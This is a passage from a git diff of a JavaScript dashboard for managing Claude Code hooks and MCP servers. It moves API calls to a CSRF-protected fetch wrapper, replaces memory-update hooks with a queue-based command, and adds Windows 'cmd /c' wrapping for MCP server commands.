||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ injectionMode: mode })
|
||||
@@ -1021,7 +1034,7 @@ async function startCodexLensInstall() {
|
||||
}, 1500);
|
||||
|
||||
try {
|
||||
const response = await fetch('/api/codexlens/bootstrap', {
|
||||
const response = await csrfFetch('/api/codexlens/bootstrap', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({})
|
||||
@@ -1034,6 +1047,15 @@ async function startCodexLensInstall() {
|
||||
progressBar.style.width = '100%';
|
||||
statusText.textContent = 'Installation complete!';
|
||||
|
||||
// 清理缓存以确保刷新后获取最新状态
|
||||
if (window.cacheManager) {
|
||||
window.cacheManager.invalidate('all-status');
|
||||
window.cacheManager.invalidate('dashboard-init');
|
||||
}
|
||||
if (typeof window.invalidateCodexLensCache === 'function') {
|
||||
window.invalidateCodexLensCache();
|
||||
}
|
||||
|
||||
setTimeout(() => {
|
||||
closeCodexLensInstallWizard();
|
||||
showRefreshToast('CodexLens installed successfully!', 'success');
|
||||
@@ -1171,7 +1193,7 @@ async function startCodexLensUninstall() {
|
||||
}, 500);
|
||||
|
||||
try {
|
||||
const response = await fetch('/api/codexlens/uninstall', {
|
||||
const response = await csrfFetch('/api/codexlens/uninstall', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({})
|
||||
@@ -1184,6 +1206,15 @@ async function startCodexLensUninstall() {
|
||||
progressBar.style.width = '100%';
|
||||
statusText.textContent = 'Uninstallation complete!';
|
||||
|
||||
// 清理缓存以确保刷新后获取最新状态
|
||||
if (window.cacheManager) {
|
||||
window.cacheManager.invalidate('all-status');
|
||||
window.cacheManager.invalidate('dashboard-init');
|
||||
}
|
||||
if (typeof window.invalidateCodexLensCache === 'function') {
|
||||
window.invalidateCodexLensCache();
|
||||
}
|
||||
|
||||
setTimeout(() => {
|
||||
closeCodexLensUninstallWizard();
|
||||
showRefreshToast('CodexLens uninstalled successfully!', 'success');
|
||||
@@ -1257,7 +1288,7 @@ async function initCodexLensIndex() {
|
||||
console.log('[CodexLens] Initializing index for path:', targetPath);
|
||||
|
||||
try {
|
||||
const response = await fetch('/api/codexlens/init', {
|
||||
const response = await csrfFetch('/api/codexlens/init', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ path: targetPath })
|
||||
@@ -1424,7 +1455,7 @@ async function startSemanticInstall() {
|
||||
}, 2000);
|
||||
|
||||
try {
|
||||
const response = await fetch('/api/codexlens/semantic/install', {
|
||||
const response = await csrfFetch('/api/codexlens/semantic/install', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({})
|
||||
|
||||
@@ -49,43 +49,17 @@ const HOOK_TEMPLATES = {
|
||||
description: 'Auto-update code index when files are written or edited',
|
||||
category: 'indexing'
|
||||
},
|
||||
'memory-update-related': {
|
||||
'memory-update-queue': {
|
||||
event: 'Stop',
|
||||
matcher: '',
|
||||
command: 'bash',
|
||||
args: ['-c', 'ccw tool exec update_module_claude \'{"strategy":"related","tool":"gemini"}\''],
|
||||
description: 'Update CLAUDE.md for changed modules when session ends',
|
||||
args: ['-c', 'ccw tool exec memory_queue "{\\"action\\":\\"add\\",\\"path\\":\\"$CLAUDE_PROJECT_DIR\\"}"'],
|
||||
description: 'Queue CLAUDE.md update when session ends (batched by threshold/timeout)',
|
||||
category: 'memory',
|
||||
configurable: true,
|
||||
config: {
|
||||
tool: { type: 'select', options: ['gemini', 'qwen', 'codex'], default: 'gemini', label: 'CLI Tool' },
|
||||
strategy: { type: 'select', options: ['related', 'single-layer'], default: 'related', label: 'Strategy' }
|
||||
}
|
||||
},
|
||||
'memory-update-periodic': {
|
||||
event: 'PostToolUse',
|
||||
matcher: 'Write|Edit',
|
||||
command: 'bash',
|
||||
args: ['-c', 'INTERVAL=300; LAST_FILE="$HOME/.claude/.last_memory_update"; mkdir -p "$HOME/.claude"; NOW=$(date +%s); LAST=0; [ -f "$LAST_FILE" ] && LAST=$(cat "$LAST_FILE" 2>/dev/null || echo 0); if [ $((NOW - LAST)) -ge $INTERVAL ]; then echo $NOW > "$LAST_FILE"; ccw tool exec update_module_claude \'{"strategy":"related","tool":"gemini"}\' & fi'],
|
||||
description: 'Periodically update CLAUDE.md (default: 5 min interval)',
|
||||
category: 'memory',
|
||||
configurable: true,
|
||||
config: {
|
||||
tool: { type: 'select', options: ['gemini', 'qwen', 'codex'], default: 'gemini', label: 'CLI Tool' },
|
||||
interval: { type: 'number', default: 300, min: 60, max: 3600, label: 'Interval (seconds)', step: 60 }
|
||||
}
|
||||
},
|
||||
'memory-update-count-based': {
|
||||
event: 'PostToolUse',
|
||||
matcher: 'Write|Edit',
|
||||
command: 'bash',
|
||||
args: ['-c', 'THRESHOLD=10; COUNT_FILE="$HOME/.claude/.memory_update_count"; mkdir -p "$HOME/.claude"; INPUT=$(cat); FILE_PATH=$(echo "$INPUT" | jq -r ".tool_input.file_path // .tool_input.path // empty" 2>/dev/null); [ -z "$FILE_PATH" ] && exit 0; COUNT=0; [ -f "$COUNT_FILE" ] && COUNT=$(cat "$COUNT_FILE" 2>/dev/null || echo 0); COUNT=$((COUNT + 1)); echo $COUNT > "$COUNT_FILE"; if [ $COUNT -ge $THRESHOLD ]; then echo 0 > "$COUNT_FILE"; ccw tool exec update_module_claude \'{"strategy":"related","tool":"gemini"}\' & fi'],
|
||||
description: 'Update CLAUDE.md when file changes reach threshold (default: 10 files)',
|
||||
category: 'memory',
|
||||
configurable: true,
|
||||
config: {
|
||||
tool: { type: 'select', options: ['gemini', 'qwen', 'codex'], default: 'gemini', label: 'CLI Tool' },
|
||||
threshold: { type: 'number', default: 10, min: 3, max: 50, label: 'File count threshold', step: 1 }
|
||||
threshold: { type: 'number', default: 5, min: 1, max: 20, label: 'Threshold (paths)', step: 1 },
|
||||
timeout: { type: 'number', default: 300, min: 60, max: 1800, label: 'Timeout (seconds)', step: 60 }
|
||||
}
|
||||
},
|
||||
// SKILL Context Loader templates
|
||||
@@ -210,33 +184,19 @@ const HOOK_TEMPLATES = {
|
||||
const WIZARD_TEMPLATES = {
|
||||
'memory-update': {
|
||||
name: 'Memory Update Hook',
|
||||
description: 'Automatically update CLAUDE.md documentation based on code changes',
|
||||
description: 'Queue-based CLAUDE.md updates with configurable threshold and timeout',
|
||||
icon: 'brain',
|
||||
options: [
|
||||
{
|
||||
id: 'on-stop',
|
||||
name: 'On Session End',
|
||||
description: 'Update documentation when Claude session ends',
|
||||
templateId: 'memory-update-related'
|
||||
},
|
||||
{
|
||||
id: 'periodic',
|
||||
name: 'Periodic Update',
|
||||
description: 'Update documentation at regular intervals during session',
|
||||
templateId: 'memory-update-periodic'
|
||||
},
|
||||
{
|
||||
id: 'count-based',
|
||||
name: 'Count-Based Update',
|
||||
description: 'Update documentation when file changes reach threshold',
|
||||
templateId: 'memory-update-count-based'
|
||||
id: 'queue',
|
||||
name: 'Queue-Based Update',
|
||||
description: 'Batch updates when threshold reached or timeout expires',
|
||||
templateId: 'memory-update-queue'
|
||||
}
|
||||
],
|
||||
configFields: [
|
||||
{ key: 'tool', type: 'select', label: 'CLI Tool', options: ['gemini', 'qwen', 'codex'], default: 'gemini', description: 'Tool for documentation generation' },
|
||||
{ key: 'interval', type: 'number', label: 'Interval (seconds)', default: 300, min: 60, max: 3600, step: 60, showFor: ['periodic'], description: 'Time between updates' },
|
||||
{ key: 'threshold', type: 'number', label: 'File Count Threshold', default: 10, min: 3, max: 50, step: 1, showFor: ['count-based'], description: 'Number of file changes to trigger update' },
|
||||
{ key: 'strategy', type: 'select', label: 'Update Strategy', options: ['related', 'single-layer'], default: 'related', description: 'Related: changed modules, Single-layer: current directory' }
|
||||
{ key: 'threshold', type: 'number', label: 'Threshold (paths)', default: 5, min: 1, max: 20, step: 1, description: 'Number of paths to trigger batch update' },
|
||||
{ key: 'timeout', type: 'number', label: 'Timeout (seconds)', default: 300, min: 60, max: 1800, step: 60, description: 'Auto-flush queue after this time' }
|
||||
]
|
||||
},
|
||||
'skill-context': {
|
||||
@@ -449,7 +409,7 @@ async function saveHook(scope, event, hookData) {
|
||||
// Convert to Claude Code format before saving
|
||||
const convertedHookData = convertToClaudeCodeFormat(hookData);
|
||||
|
||||
const response = await fetch('/api/hooks', {
|
||||
const response = await csrfFetch('/api/hooks', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -478,7 +438,7 @@ async function saveHook(scope, event, hookData) {
|
||||
|
||||
async function removeHook(scope, event, hookIndex) {
|
||||
try {
|
||||
const response = await fetch('/api/hooks', {
|
||||
const response = await csrfFetch('/api/hooks', {
|
||||
method: 'DELETE',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -730,9 +690,7 @@ function renderWizardModalContent() {
|
||||
// Helper to get translated option names
|
||||
const getOptionName = (optId) => {
|
||||
if (wizardId === 'memory-update') {
|
||||
if (optId === 'on-stop') return t('hook.wizard.onSessionEnd');
|
||||
if (optId === 'periodic') return t('hook.wizard.periodicUpdate');
|
||||
if (optId === 'count-based') return t('hook.wizard.countBasedUpdate');
|
||||
if (optId === 'queue') return t('hook.wizard.queueBasedUpdate') || 'Queue-Based Update';
|
||||
}
|
||||
if (wizardId === 'memory-setup') {
|
||||
if (optId === 'file-read') return t('hook.wizard.fileReadTracker');
|
||||
@@ -748,9 +706,7 @@ function renderWizardModalContent() {
|
||||
|
||||
const getOptionDesc = (optId) => {
|
||||
if (wizardId === 'memory-update') {
|
||||
if (optId === 'on-stop') return t('hook.wizard.onSessionEndDesc');
|
||||
if (optId === 'periodic') return t('hook.wizard.periodicUpdateDesc');
|
||||
if (optId === 'count-based') return t('hook.wizard.countBasedUpdateDesc');
|
||||
if (optId === 'queue') return t('hook.wizard.queueBasedUpdateDesc') || 'Batch updates when threshold reached or timeout expires';
|
||||
}
|
||||
if (wizardId === 'memory-setup') {
|
||||
if (optId === 'file-read') return t('hook.wizard.fileReadTrackerDesc');
|
||||
@@ -767,20 +723,16 @@ function renderWizardModalContent() {
|
||||
// Helper to get translated field labels
|
||||
const getFieldLabel = (fieldKey) => {
|
||||
const labels = {
|
||||
'tool': t('hook.wizard.cliTool'),
|
||||
'interval': t('hook.wizard.intervalSeconds'),
|
||||
'threshold': t('hook.wizard.fileCountThreshold'),
|
||||
'strategy': t('hook.wizard.updateStrategy')
|
||||
'threshold': t('hook.wizard.thresholdPaths') || 'Threshold (paths)',
|
||||
'timeout': t('hook.wizard.timeoutSeconds') || 'Timeout (seconds)'
|
||||
};
|
||||
return labels[fieldKey] || wizard.configFields.find(f => f.key === fieldKey)?.label || fieldKey;
|
||||
};
|
||||
|
||||
const getFieldDesc = (fieldKey) => {
|
||||
const descs = {
|
||||
'tool': t('hook.wizard.toolForDocGen'),
|
||||
'interval': t('hook.wizard.timeBetweenUpdates'),
|
||||
'threshold': t('hook.wizard.fileCountThresholdDesc'),
|
||||
'strategy': t('hook.wizard.relatedStrategy')
|
||||
'threshold': t('hook.wizard.thresholdPathsDesc') || 'Number of paths to trigger batch update',
|
||||
'timeout': t('hook.wizard.timeoutSecondsDesc') || 'Auto-flush queue after this time'
|
||||
};
|
||||
return descs[fieldKey] || wizard.configFields.find(f => f.key === fieldKey)?.description || '';
|
||||
};
|
||||
@@ -1154,21 +1106,10 @@ function generateWizardCommand() {
|
||||
}
|
||||
|
||||
// Handle memory-update wizard (default)
|
||||
const tool = wizardConfig.tool || 'gemini';
|
||||
const strategy = wizardConfig.strategy || 'related';
|
||||
const interval = wizardConfig.interval || 300;
|
||||
const threshold = wizardConfig.threshold || 10;
|
||||
|
||||
// Build the ccw tool command based on configuration
|
||||
const params = JSON.stringify({ strategy, tool });
|
||||
|
||||
if (triggerType === 'periodic') {
|
||||
return `INTERVAL=${interval}; LAST_FILE="$HOME/.claude/.last_memory_update"; mkdir -p "$HOME/.claude"; NOW=$(date +%s); LAST=0; [ -f "$LAST_FILE" ] && LAST=$(cat "$LAST_FILE" 2>/dev/null || echo 0); if [ $((NOW - LAST)) -ge $INTERVAL ]; then echo $NOW > "$LAST_FILE"; ccw tool exec update_module_claude '${params}' & fi`;
|
||||
} else if (triggerType === 'count-based') {
|
||||
return `THRESHOLD=${threshold}; COUNT_FILE="$HOME/.claude/.memory_update_count"; mkdir -p "$HOME/.claude"; INPUT=$(cat); FILE_PATH=$(echo "$INPUT" | jq -r ".tool_input.file_path // .tool_input.path // empty" 2>/dev/null); [ -z "$FILE_PATH" ] && exit 0; COUNT=0; [ -f "$COUNT_FILE" ] && COUNT=$(cat "$COUNT_FILE" 2>/dev/null || echo 0); COUNT=$((COUNT + 1)); echo $COUNT > "$COUNT_FILE"; if [ $COUNT -ge $THRESHOLD ]; then echo 0 > "$COUNT_FILE"; ccw tool exec update_module_claude '${params}' & fi`;
|
||||
} else {
|
||||
return `ccw tool exec update_module_claude '${params}'`;
|
||||
}
|
||||
// Now uses memory_queue for batched updates with configurable threshold/timeout
|
||||
// The command adds to queue, configuration is applied separately via submitHookWizard
|
||||
const params = `"{\\"action\\":\\"add\\",\\"path\\":\\"$CLAUDE_PROJECT_DIR\\"}"`;
|
||||
return `ccw tool exec memory_queue ${params}`;
|
||||
}
|
||||
|
||||
async function submitHookWizard() {
|
||||
@@ -1263,6 +1204,26 @@ async function submitHookWizard() {
|
||||
}
|
||||
|
||||
await saveHook(scope, baseTemplate.event, hookData);
|
||||
|
||||
// For memory-update wizard, also configure queue settings
|
||||
if (wizard.id === 'memory-update') {
|
||||
const threshold = wizardConfig.threshold || 5;
|
||||
const timeout = wizardConfig.timeout || 300;
|
||||
try {
|
||||
const configParams = JSON.stringify({ action: 'configure', threshold, timeout });
|
||||
const response = await fetch('/api/tools/execute', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ tool: 'memory_queue', params: configParams })
|
||||
});
|
||||
if (response.ok) {
|
||||
showRefreshToast(`Queue configured: threshold=${threshold}, timeout=${timeout}s`, 'success');
|
||||
}
|
||||
} catch (e) {
|
||||
console.warn('Failed to configure memory queue:', e);
|
||||
}
|
||||
}
|
||||
|
||||
closeHookWizardModal();
|
||||
}
|
||||
|
||||
|
||||
@@ -252,7 +252,7 @@ async function cleanIndexProject(projectId) {
|
||||
|
||||
// The project ID is the directory name in the index folder
|
||||
// We need to construct the full path or use a clean API
|
||||
const response = await fetch('/api/codexlens/clean', {
|
||||
const response = await csrfFetch('/api/codexlens/clean', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ projectId: projectId })
|
||||
@@ -282,7 +282,7 @@ async function cleanAllIndexesConfirm() {
|
||||
try {
|
||||
showRefreshToast(t('index.cleaning') || 'Cleaning indexes...', 'info');
|
||||
|
||||
const response = await fetch('/api/codexlens/clean', {
|
||||
const response = await csrfFetch('/api/codexlens/clean', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ all: true })
|
||||
|
||||
@@ -84,6 +84,147 @@ function getCliMode() {
|
||||
return currentCliMode;
|
||||
}
|
||||
|
||||
// ========== Cross-Platform MCP Helpers ==========
|
||||
|
||||
/**
|
||||
* Build cross-platform MCP server configuration
|
||||
* On Windows, wraps npx/node/python commands with cmd /c for proper execution
|
||||
* @param {string} command - The command to run (e.g., 'npx', 'node', 'python')
|
||||
* @param {string[]} args - Command arguments
|
||||
* @param {object} [options] - Additional options (env, type, etc.)
|
||||
* @returns {object} MCP server configuration
|
||||
*/
|
||||
function buildCrossPlatformMcpConfig(command, args = [], options = {}) {
|
||||
const { env, type, ...rest } = options;
|
||||
|
||||
// Commands that need cmd /c wrapper on Windows
|
||||
const windowsWrappedCommands = ['npx', 'npm', 'node', 'python', 'python3', 'pip', 'pip3', 'pnpm', 'yarn', 'bun'];
|
||||
const needsWindowsWrapper = isWindowsPlatform && windowsWrappedCommands.includes(command.toLowerCase());
|
||||
|
||||
const config = needsWindowsWrapper
|
||||
? { command: 'cmd', args: ['/c', command, ...args] }
|
||||
: { command, args };
|
||||
|
||||
// Add optional fields
|
||||
if (type) config.type = type;
|
||||
if (env && Object.keys(env).length > 0) config.env = env;
|
||||
Object.assign(config, rest);
|
||||
|
||||
return config;
|
||||
}
|
||||
|
||||
/**
|
||||
* Check if MCP config needs Windows cmd /c wrapper
|
||||
* @param {object} serverConfig - MCP server configuration
|
||||
* @returns {object} { needsWrapper: boolean, command: string }
|
||||
*/
|
||||
function checkWindowsMcpCompatibility(serverConfig) {
|
||||
if (!isWindowsPlatform) return { needsWrapper: false };
|
||||
|
||||
const command = serverConfig.command?.toLowerCase() || '';
|
||||
const windowsWrappedCommands = ['npx', 'npm', 'node', 'python', 'python3', 'pip', 'pip3', 'pnpm', 'yarn', 'bun'];
|
||||
|
||||
// Already wrapped with cmd
|
||||
if (command === 'cmd') return { needsWrapper: false };
|
||||
|
||||
const needsWrapper = windowsWrappedCommands.includes(command);
|
||||
return { needsWrapper, command: serverConfig.command };
|
||||
}
|
||||
|
||||
/**
|
||||
* Auto-fix MCP config for Windows platform
|
||||
* @param {object} serverConfig - Original MCP server configuration
|
||||
* @returns {object} Fixed configuration (or original if no fix needed)
|
||||
*/
|
||||
function autoFixWindowsMcpConfig(serverConfig) {
|
||||
const { needsWrapper, command } = checkWindowsMcpCompatibility(serverConfig);
|
||||
|
||||
if (!needsWrapper) return serverConfig;
|
||||
|
||||
// Create new config with cmd /c wrapper
|
||||
const fixedConfig = {
|
||||
...serverConfig,
|
||||
command: 'cmd',
|
||||
args: ['/c', command, ...(serverConfig.args || [])]
|
||||
};
|
||||
|
||||
return fixedConfig;
|
||||
}
|
||||
|
||||
/**
|
||||
* Show Windows compatibility warning for MCP config
|
||||
* @param {string} serverName - Name of the MCP server
|
||||
* @param {object} serverConfig - MCP server configuration
|
||||
* @returns {Promise<boolean>} True if user confirms auto-fix, false to keep original
|
||||
*/
|
||||
async function showWindowsMcpCompatibilityWarning(serverName, serverConfig) {
|
||||
const { needsWrapper, command } = checkWindowsMcpCompatibility(serverConfig);
|
||||
|
||||
if (!needsWrapper) return false;
|
||||
|
||||
// Show warning toast with auto-fix option
|
||||
const message = t('mcp.windows.compatibilityWarning', {
|
||||
name: serverName,
|
||||
command: command
|
||||
});
|
||||
|
||||
return new Promise((resolve) => {
|
||||
// Create custom toast with action buttons
|
||||
const toastContainer = document.getElementById('refreshToast') || createToastContainer();
|
||||
const toastId = `windows-mcp-warning-${Date.now()}`;
|
||||
|
||||
const toastHtml = `
|
||||
<div id="${toastId}" class="fixed bottom-4 right-4 bg-warning text-warning-foreground p-4 rounded-lg shadow-lg max-w-md z-50 animate-slide-up">
|
||||
<div class="flex items-start gap-3">
|
||||
<i data-lucide="alert-triangle" class="w-5 h-5 flex-shrink-0 mt-0.5"></i>
|
||||
<div class="flex-1">
|
||||
<p class="font-medium mb-2">${t('mcp.windows.title')}</p>
|
||||
<p class="text-sm opacity-90 mb-3">${message}</p>
|
||||
<div class="flex gap-2">
|
||||
<button class="px-3 py-1.5 text-sm bg-background text-foreground rounded hover:opacity-90"
|
||||
onclick="document.getElementById('${toastId}').remove(); window._mcpWindowsResolve && window._mcpWindowsResolve(true)">
|
||||
${t('mcp.windows.autoFix')}
|
||||
</button>
|
||||
<button class="px-3 py-1.5 text-sm border border-current rounded hover:opacity-90"
|
||||
onclick="document.getElementById('${toastId}').remove(); window._mcpWindowsResolve && window._mcpWindowsResolve(false)">
|
||||
${t('mcp.windows.keepOriginal')}
|
||||
</button>
|
||||
</div>
|
||||
</div>
|
||||
<button onclick="document.getElementById('${toastId}').remove(); window._mcpWindowsResolve && window._mcpWindowsResolve(false)"
|
||||
class="text-current opacity-70 hover:opacity-100">
|
||||
<i data-lucide="x" class="w-4 h-4"></i>
|
||||
</button>
|
||||
</div>
|
||||
</div>
|
||||
`;
|
||||
|
||||
// Store resolve function globally for button clicks
|
||||
window._mcpWindowsResolve = (result) => {
|
||||
delete window._mcpWindowsResolve;
|
||||
resolve(result);
|
||||
};
|
||||
|
||||
document.body.insertAdjacentHTML('beforeend', toastHtml);
|
||||
|
||||
// Initialize icons
|
||||
if (typeof lucide !== 'undefined') {
|
||||
lucide.createIcons();
|
||||
}
|
||||
|
||||
// Auto-dismiss after 15 seconds (keep original)
|
||||
setTimeout(() => {
|
||||
const toast = document.getElementById(toastId);
|
||||
if (toast) {
|
||||
toast.remove();
|
||||
if (window._mcpWindowsResolve) {
|
||||
window._mcpWindowsResolve(false);
|
||||
}
|
||||
}
|
||||
}, 15000);
|
||||
});
|
||||
}
|
||||
|
||||
// ========== Codex MCP Functions ==========
|
||||
|
||||
/**
|
||||
@@ -91,7 +232,7 @@ function getCliMode() {
|
||||
*/
|
||||
async function addCodexMcpServer(serverName, serverConfig) {
|
||||
try {
|
||||
const response = await fetch('/api/codex-mcp-add', {
|
||||
const response = await csrfFetch('/api/codex-mcp-add', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -123,7 +264,7 @@ async function addCodexMcpServer(serverName, serverConfig) {
|
||||
*/
|
||||
async function removeCodexMcpServer(serverName) {
|
||||
try {
|
||||
const response = await fetch('/api/codex-mcp-remove', {
|
||||
const response = await csrfFetch('/api/codex-mcp-remove', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ serverName })
|
||||
@@ -152,7 +293,7 @@ async function removeCodexMcpServer(serverName) {
|
||||
*/
|
||||
async function toggleCodexMcpServer(serverName, enabled) {
|
||||
try {
|
||||
const response = await fetch('/api/codex-mcp-toggle', {
|
||||
const response = await csrfFetch('/api/codex-mcp-toggle', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ serverName, enabled })
|
||||
@@ -205,7 +346,7 @@ async function copyCodexServerToClaude(serverName, serverConfig) {
|
||||
|
||||
async function toggleMcpServer(serverName, enable) {
|
||||
try {
|
||||
const response = await fetch('/api/mcp-toggle', {
|
||||
const response = await csrfFetch('/api/mcp-toggle', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -239,7 +380,7 @@ async function copyMcpServerToProject(serverName, serverConfig, configType = nul
|
||||
configType = preferredProjectConfigType;
|
||||
}
|
||||
|
||||
const response = await fetch('/api/mcp-copy-server', {
|
||||
const response = await csrfFetch('/api/mcp-copy-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -316,7 +457,7 @@ function showConfigTypeDialog() {
|
||||
|
||||
async function removeMcpServerFromProject(serverName) {
|
||||
try {
|
||||
const response = await fetch('/api/mcp-remove-server', {
|
||||
const response = await csrfFetch('/api/mcp-remove-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -343,7 +484,7 @@ async function removeMcpServerFromProject(serverName) {
|
||||
|
||||
async function addGlobalMcpServer(serverName, serverConfig) {
|
||||
try {
|
||||
const response = await fetch('/api/mcp-add-global-server', {
|
||||
const response = await csrfFetch('/api/mcp-add-global-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -370,7 +511,7 @@ async function addGlobalMcpServer(serverName, serverConfig) {
|
||||
|
||||
async function removeGlobalMcpServer(serverName) {
|
||||
try {
|
||||
const response = await fetch('/api/mcp-remove-global-server', {
|
||||
const response = await csrfFetch('/api/mcp-remove-global-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -809,7 +950,7 @@ async function submitMcpCreateFromJson() {
|
||||
|
||||
for (const [name, config] of Object.entries(servers)) {
|
||||
try {
|
||||
const response = await fetch('/api/mcp-copy-server', {
|
||||
const response = await csrfFetch('/api/mcp-copy-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -847,6 +988,19 @@ async function submitMcpCreateFromJson() {
|
||||
}
|
||||
|
||||
async function createMcpServerWithConfig(name, serverConfig, scope = 'project') {
|
||||
// Check Windows compatibility and offer auto-fix if needed
|
||||
const { needsWrapper } = checkWindowsMcpCompatibility(serverConfig);
|
||||
let finalConfig = serverConfig;
|
||||
|
||||
if (needsWrapper) {
|
||||
// Show warning and ask user whether to auto-fix
|
||||
const shouldAutoFix = await showWindowsMcpCompatibilityWarning(name, serverConfig);
|
||||
if (shouldAutoFix) {
|
||||
finalConfig = autoFixWindowsMcpConfig(serverConfig);
|
||||
console.log('[MCP] Auto-fixed config for Windows:', finalConfig);
|
||||
}
|
||||
}
|
||||
|
||||
// Submit to API
|
||||
try {
|
||||
let response;
|
||||
@@ -854,33 +1008,33 @@ async function createMcpServerWithConfig(name, serverConfig, scope = 'project')
|
||||
|
||||
if (scope === 'codex') {
|
||||
// Create in Codex config.toml
|
||||
response = await fetch('/api/codex-mcp-add', {
|
||||
response = await csrfFetch('/api/codex-mcp-add', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
serverName: name,
|
||||
serverConfig: serverConfig
|
||||
serverConfig: finalConfig
|
||||
})
|
||||
});
|
||||
scopeLabel = 'Codex';
|
||||
} else if (scope === 'global') {
|
||||
response = await fetch('/api/mcp-add-global-server', {
|
||||
response = await csrfFetch('/api/mcp-add-global-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
serverName: name,
|
||||
serverConfig: serverConfig
|
||||
serverConfig: finalConfig
|
||||
})
|
||||
});
|
||||
scopeLabel = 'global';
|
||||
} else {
|
||||
response = await fetch('/api/mcp-copy-server', {
|
||||
response = await csrfFetch('/api/mcp-copy-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
projectPath: projectPath,
|
||||
serverName: name,
|
||||
serverConfig: serverConfig
|
||||
serverConfig: finalConfig
|
||||
})
|
||||
});
|
||||
scopeLabel = 'project';
|
||||
@@ -1006,7 +1160,7 @@ async function installCcwToolsMcp(scope = 'workspace') {
|
||||
|
||||
if (scope === 'global') {
|
||||
// Install to global (~/.claude.json mcpServers)
|
||||
const response = await fetch('/api/mcp-add-global-server', {
|
||||
const response = await csrfFetch('/api/mcp-add-global-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -1028,7 +1182,7 @@ async function installCcwToolsMcp(scope = 'workspace') {
|
||||
} else {
|
||||
// Install to workspace (use preferredProjectConfigType)
|
||||
const configType = preferredProjectConfigType;
|
||||
const response = await fetch('/api/mcp-copy-server', {
|
||||
const response = await csrfFetch('/api/mcp-copy-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -1074,7 +1228,7 @@ async function updateCcwToolsMcp(scope = 'workspace') {
|
||||
|
||||
if (scope === 'global') {
|
||||
// Update global (~/.claude.json mcpServers)
|
||||
const response = await fetch('/api/mcp-add-global-server', {
|
||||
const response = await csrfFetch('/api/mcp-add-global-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -1096,7 +1250,7 @@ async function updateCcwToolsMcp(scope = 'workspace') {
|
||||
} else {
|
||||
// Update workspace (use preferredProjectConfigType)
|
||||
const configType = preferredProjectConfigType;
|
||||
const response = await fetch('/api/mcp-copy-server', {
|
||||
const response = await csrfFetch('/api/mcp-copy-server', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
@@ -1231,16 +1385,14 @@ const RECOMMENDED_MCP_SERVERS = [
|
||||
descKey: 'mcp.ace-tool.field.token.desc'
|
||||
}
|
||||
],
|
||||
buildConfig: (values) => ({
|
||||
command: 'npx',
|
||||
args: [
|
||||
'ace-tool',
|
||||
'--base-url',
|
||||
values.baseUrl || 'https://acemcp.heroman.wtf/relay/',
|
||||
'--token',
|
||||
values.token
|
||||
]
|
||||
})
|
||||
// Uses buildCrossPlatformMcpConfig for automatic Windows cmd /c wrapping
|
||||
buildConfig: (values) => buildCrossPlatformMcpConfig('npx', [
|
||||
'ace-tool',
|
||||
'--base-url',
|
||||
values.baseUrl || 'https://acemcp.heroman.wtf/relay/',
|
||||
'--token',
|
||||
values.token
|
||||
])
|
||||
},
|
||||
{
|
||||
id: 'chrome-devtools',
|
||||
@@ -1249,12 +1401,8 @@ const RECOMMENDED_MCP_SERVERS = [
|
||||
icon: 'chrome',
|
||||
category: 'browser',
|
||||
fields: [],
|
||||
buildConfig: () => ({
|
||||
type: 'stdio',
|
||||
command: 'npx',
|
||||
args: ['chrome-devtools-mcp@latest'],
|
||||
env: {}
|
||||
})
|
||||
// Uses buildCrossPlatformMcpConfig for automatic Windows cmd /c wrapping
|
||||
buildConfig: () => buildCrossPlatformMcpConfig('npx', ['chrome-devtools-mcp@latest'], { type: 'stdio' })
|
||||
},
|
||||
{
|
||||
id: 'exa',
|
||||
@@ -1273,16 +1421,10 @@ const RECOMMENDED_MCP_SERVERS = [
|
||||
